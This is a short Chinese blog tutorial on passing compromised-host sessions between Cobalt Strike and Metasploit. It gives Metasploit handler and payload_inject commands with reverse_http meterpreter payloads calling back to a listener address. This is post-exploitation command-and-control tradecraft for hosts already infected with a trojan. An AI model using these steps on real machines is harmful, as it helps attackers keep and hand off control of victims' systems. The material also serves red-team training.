CobaltStrike和Metasploit联动


Cobalt strike 向 Msf传递会话

当我们获得一个CS木马会话时,那么该怎么传递到msf呢?其实也挺简单的,再配置一个监听器,设置模块为Foreign HTTP。



配置好后在上线的主机上右击Spawn(增加会话),选择Foreign HTTP监听模块,这时候msf监听那边就会接收到会话



配置MSF

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.1
set lport 2020
run

Msf派生shell给Cobaltstrike

这里还是新建一个监听器,设置模块为beacon HTTP



接下来把kali上获得的meterpreter会话转发到cobaltstrike主机上,这里我们需要用到一个exploit模块:

exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.0.1
set lport 8081
set session 4
run



这时候返回客户端可以发现已经返回一个名为CS的会话


                              最后来听首歌放松一下

文章作者: 洋葱
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 洋葱 !
 本篇
CobaltStrike和Metasploit联动 CobaltStrike和Metasploit联动
Cobalt strike 向 Msf传递会话当我们获得一个CS木马会话时,那么该怎么传递到msf呢?其实也挺简单的,再配置一个监听器,设置模块为Foreign HTTP。配置好后在上线的主机上右击Spawn(增加会话),选择Foreign
2021-05-31
下一篇 
Jenkins未授权访问漏洞&命令执行 Jenkins未授权访问漏洞&命令执行
未授权访问未授权访问地址 http://127.0.0.1:8080/manage http://127.0.0.1:8080/script 访问manage页面 进入Script Console 进入Script Console之后是一
2021-05-30
  目录